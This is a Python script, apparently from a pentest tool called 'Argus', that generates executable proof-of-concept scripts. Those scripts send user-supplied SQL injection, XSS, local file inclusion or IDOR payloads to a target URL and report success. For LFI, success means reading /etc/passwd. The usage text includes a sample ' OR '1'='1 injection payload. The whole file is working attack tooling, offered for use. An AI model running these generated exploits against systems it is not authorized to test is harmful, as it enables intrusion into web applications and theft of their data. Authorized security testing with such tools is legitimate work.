#!/usr/bin/env python3
import sys, os

def generate_poc(vuln_type, target, payload, description=""):
    poc = f'''#!/usr/bin/env python3
"""
PoC for {vuln_type} on {target}
Generated by Argus v42.0
{description}
"""
import requests

TARGET = "{target}"
PAYLOAD = """{payload}"""

def exploit():
    print(f"[*] Exploiting {vuln_type} on {{TARGET}}")
    try:
        if "{vuln_type}" == "SQLi":
            r = requests.get(TARGET, params={{"id": PAYLOAD}}, timeout=10)
            if "error" in r.text.lower() or "sql" in r.text.lower():
                print("[+] SQLi CONFIRMED! Response length:", len(r.text))
                print("[+] Response:", r.text[:500])
            else:
                print("[-] No SQLi detected")
        
        elif "{vuln_type}" == "XSS":
            r = requests.get(TARGET, params={{"q": PAYLOAD}}, timeout=10)
            if PAYLOAD in r.text:
                print("[+] XSS CONFIRMED! Payload reflected in response")
            else:
                print("[-] No XSS detected")
        
        elif "{vuln_type}" == "LFI":
            r = requests.get(TARGET, params={{"file": PAYLOAD}}, timeout=10)
            if "root:" in r.text:
                print("[+] LFI CONFIRMED! /etc/passwd read successfully")
                print("[+] Response:", r.text[:500])
            else:
                print("[-] No LFI detected")
        
        elif "{vuln_type}" == "IDOR":
            r = requests.get(TARGET, timeout=10)
            print(f"[*] Status: {{r.status_code}}")
            print(f"[*] Response: {{r.text[:300]}}")
        
        else:
            r = requests.get(TARGET + PAYLOAD, timeout=10)
            print(f"[*] Status: {{r.status_code}}")
            print(f"[*] Response: {{r.text[:500]}}")
    
    except Exception as e:
        print(f"[-] Error: {{e}}")

if __name__ == "__main__":
    exploit()
'''
    poc_dir = os.path.expanduser('~/argus_pocs')
    os.makedirs(poc_dir, exist_ok=True)
    fname = f"{vuln_type}_{target.replace('://','_').replace('/','_')[:30]}.py"
    fpath = os.path.join(poc_dir, fname)
    with open(fpath, 'w') as f:
        f.write(poc)
    os.chmod(fpath, 0o755)
    print(f"[+] PoC saved: {fpath}")

if __name__ == '__main__':
    if len(sys.argv) >= 4:
        generate_poc(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4] if len(sys.argv) > 4 else "")
    else:
        print("Usage: python3 ~/poc_generator.py <type> <target> <payload> [description]")
        print("Example: python3 ~/poc_generator.py SQLi 'http://target.com?id=' \"' OR '1'='1\"")
